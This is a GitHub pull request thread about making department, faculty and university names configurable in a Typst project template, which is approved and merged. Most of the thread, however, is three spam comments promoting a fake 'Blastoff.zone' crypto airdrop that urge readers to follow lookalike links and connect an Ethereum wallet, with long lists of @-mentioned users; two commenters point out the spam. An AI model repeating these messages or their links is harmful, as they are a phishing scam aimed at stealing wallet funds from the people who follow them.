### PR TITLE
Customization change

### PR DESCRIPTION
**Pull request by irfan4902**
Made it so you can change the department, faculty and university name from the main .typ file where you import ecsproject.typ

### CODE REVIEW

**Comment by SkymanOne** [comment]
Can you please provide a screenshot of a title page just for reference?

**Comment by irfan4902** [comment]
image

**Review by SkymanOne — APPROVED** [review]
LGTM

**Comment by taylorcammack** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
alikonuk1, @yspk, @ngshaw, @CryptoDevving, @rakita, @tarvos21, @tavakyan, @rcavaz, @krusher55, @skyfe79, @koushiro, @JosepBove, @buster719, @0xCookedRice, @hzqd, @taquangtrung, @kehiy, @cnzx219, @hmrtn, @AmyBlur, @stanly-johnson, @den-mentiei, @fatfeed, @kidmam, @coolsnake, @girishramnani, @hack3r-0m, @hartex, @txaty, @makluganteng, @fubuloubu, @tomoima525, @ZhiXiao-Lin, @imotai, @vacekj, @littlefish0331, @Darth123658, @akru, @drbh, @archi-cszcli, @isgasho, @l0z0l, @dalaorock, @Dax911, @kubo39, @jmingov, @malzzz, @fly51fly, @kallydev, @revoltez

**Comment by taylorcammack** [comment]
[Banner](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
vuvoth, @DavidHur, @3235773541, @1701175145, @Pet3ris, @ivanceras, @Lawliet-Chan, @chiefbiiko, @phohtoo, @dangdennis, @shangsony, @gww-parity, @Ivshti, @eriol, @HysMagus, @aditya172926, @Arcovv, @program247365, @pmespresso, @lljxx1, @hellnoa, @csuito, @bigtree1992, @Echolinq, @Vishal-Isharani, @theofield13, @graydon, @DMClVG, @steffenix, @zwong91, @SHA888, @canokaue, @brockelmore, @wong2, @codingnirvana, @FilipLaurentiu, @canonbrother, @snowmead, @q1blue, @MoodyBoi, @deadblackclover, @legua25, @Mosun4, @sociojs, @eratzlaff, @sudotty, @holybao, @imdm, @oo7ph, @sunwaylive

**Comment by Dax911** [comment]
I dont know if there is a github error or somethings else, but this was in my inbox. I have never seen this repo before please remove me. This is the 3rd one this morning.

**Comment by wong2** [comment]
GitHub is spammed

**Comment by phieule2024** [comment]
[Banner](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](http://bibleglot.com/%5Cconnect.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
holybao, @souljo2, @gin, @d-xo, @, @LeoNero, @luiscape, @ptisserand, @benqian, @abcdabcd987, @deBroglieeeen, @Yhtiyar, @Nabilus, @darron1217, @brunoribeiro127, @odyslam, @knightdmoney, @chase-manning, @bhaskarSingh, @melg8, @nasjp, @kris524, @spinoch, @maschad96, @0xleeaki, @derozic, @jiyuu-jin, @dangdennis, @SajeevanJSPY, @aguxez, @landakram, @pryce-turner, @cjdunteman, @IvonaldoAmaral, @Will-Smith11, @ruslanjabari, @51t1n74k, @X140Yu, @Poujhit, @vyorkin, @jimmyrcom, @SoCal12Jessi, @basememara, @hazae41, @gadflysu, @onemedicine, @distractedm1nd, @hoangpq, @nmrshll, @mutalisk999

**Pull request merged**
